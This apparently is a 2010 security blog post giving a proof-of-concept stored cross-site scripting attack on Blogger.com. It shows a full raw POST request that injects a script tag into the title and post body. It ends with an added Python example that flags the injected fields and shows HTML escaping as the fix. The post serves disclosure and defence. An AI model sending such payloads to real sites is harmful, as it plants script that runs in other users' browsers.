Bounty Hunting: NO BUGS = NO PAYMENT. Google Vulnerability Rewards Program as the example for payment terms and conditions.





Hoyt LLC
http://cloudscan.me

Example Stored Cross Site Scripting Example in Blogger.com
Discovered August 15, 2010

Below is the example POST I used to create the Robo XSS Bomb on Blogger today. The Proof of Concept Exploit Example for Cross Site Scripting is below:

----------------------------------------------------------------


POST /post-create.do HTTP/1.1
Host: www.blogger.com
Proxy-Connection: keep-alive
Referer: http://www.blogger.com/post-create.g?blogID=759650017562661190
Cache-Control: max-age=0
Origin: http://www.blogger.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Cross Site Scripting Exploiter (Your Site is being crawled for vulnerabilities) CloudScan XSS Engine http://cloudscan.me
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 675

security_token=lick_my_security_token&blogURL=http%3A%2F%2Fcloudscan.blogspot.com%2F&toggleTime=1&editorModeDefault=2&javascriptEnabled=true&changeLanguage=false&securityToken=JwwHhyUKXI7EBjpXldJid2cubLc%3A1287093379997&postID=&title=5f237%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebcf26d3c915c781b9&url=&enclosuresUiVisible=true&enclosuresDataPresent=true&enclosureUrl.new=&enclosureMimeType.new=&enclosureLength.new=&enclosureCount=0&postBody=5f237%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebcf26d3c915c781b9&postLabels=&commentsMode=ON&backlinksMode=ON&postDate=10%2F14%2F10&postTime=2%3A56+PM&publish=Publish+Post
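
Added example, not part of the original post and not Blogger's code: a defender-side check that URL-decodes an excerpt of the form body above, flags the fields carrying markup characters, and shows the title value rendered with and without HTML escaping. The attribute template and the function names are assumptions; the post does not show where Blogger echoes the value.

```python
import html
import re
from urllib.parse import parse_qsl

# Excerpt of the form body from the request above: the title and postBody
# fields as sent, plus two benign fields from the same request for contrast.
FORM_BODY = (
    "blogURL=http%3A%2F%2Fcloudscan.blogspot.com%2F"
    "&title=5f237%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebcf26d3c915c781b9"
    "&postBody=5f237%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebcf26d3c915c781b9"
    "&commentsMode=ON"
)

# Characters that can close a quoted attribute or open a new tag.
MARKUP = re.compile(r"""[<>"']""")


def flag_markup_fields(body):
    """Return {field: decoded value} for fields whose decoded value contains markup characters."""
    fields = parse_qsl(body, keep_blank_values=True)
    return {name: value for name, value in fields if MARKUP.search(value)}


def render_title_attr(title, escape=True):
    """Place a title in a double-quoted attribute (hypothetical template, assumed sink)."""
    value = html.escape(title, quote=True) if escape else title
    return '<input name="title" value="%s">' % value


def has_live_script(rendered):
    """True if the rendered markup still contains an unescaped <script> tag."""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    for name, value in flag_markup_fields(FORM_BODY).items():
        print(name, "->", value)
    title = flag_markup_fields(FORM_BODY)["title"]
    print("unescaped:", render_title_attr(title, escape=False))
    print("escaped:  ", render_title_attr(title))
```

Escaping is the fix for the title; a post body that is meant to carry HTML needs an allow-list sanitizer instead, so a flag on postBody is a review signal rather than proof of a defect.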